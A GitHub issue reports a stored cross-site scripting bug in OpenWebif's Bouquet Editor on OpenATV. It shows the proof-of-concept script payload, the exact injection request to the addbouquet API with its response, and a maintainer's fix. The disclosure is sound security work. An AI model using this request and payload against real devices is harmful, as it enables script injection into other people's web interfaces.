Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS bug #1387

Closed
kozmer opened this issue Aug 4, 2021 · 2 comments
Closed

Stored XSS bug #1387

kozmer opened this issue Aug 4, 2021 · 2 comments
Labels
BUG 🐞 Not working as expected

Comments

@kozmer
Copy link

kozmer commented Aug 4, 2021

Description
Inserting JavaScript code into the "Add Bouquet" function in the Bouquet Editor leads to Stored XSS. The payload in the PoC executes each time the user goes to the OWIF interface and redirects to a different webpage.

PoC/Reproduction
Link to streamable

Image

  • OS: [OpenATV]
  • Version [6.4]

Desktop

  • Browser [Firefox]
  • Version [90.0.2]

Stored userbouquets

$ cat /etc/enigma2/userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv

#NAME <script>alert(document.domain);window.location.replace("https://github.com/kozmer");</script> (TV)


$ cat /etc/enigma2/bouquets.tv

#NAME Bouquets (TV)
#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet
#SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv" ORDER BY bouquet

Request

GET /bouqueteditor/api/addbouquet?name=%3Cscript%3Ewindow.location.replace(%22https%3A%2F%2Fgithub.com%2Fkozmer%22)%3B%3C%2Fscript%3E&mode=0&_=1628087265204 HTTP/1.1
Host: 192.168.0.22
User-Agent: Mozilla/5.0 (Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://192.168.0.22/
Cookie: TWISTED_SESSION=<removed>
Sec-GPC: 1


HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 13:28:22 GMT
Connection: close
Content-Type: text/plain
Server: TwistedWeb/16.4.0
Content-Length: 116

{"Result": [true, "Bouquet <script>window.location.replace(\"https://github.com/kozmer\");</script> (TV) created."]}
@kozmer kozmer added the BUG 🐞 Not working as expected label Aug 4, 2021
@kozmer kozmer changed the title Stored XSS bug. Stored XSS bug Aug 4, 2021
@wedebe
Copy link
Collaborator

wedebe commented Aug 4, 2021

Does Twisted have a lib to sanitise all:

  • url param inputs
  • xml & json responses
    ?

jbleyel added a commit that referenced this issue Aug 5, 2021
@jbleyel
Copy link
Contributor

jbleyel commented Aug 5, 2021

Many thanks .. please check the latest version

@jbleyel jbleyel closed this as completed Sep 2, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
BUG 🐞 Not working as expected
Projects
None yet
Development

No branches or pull requests

3 participants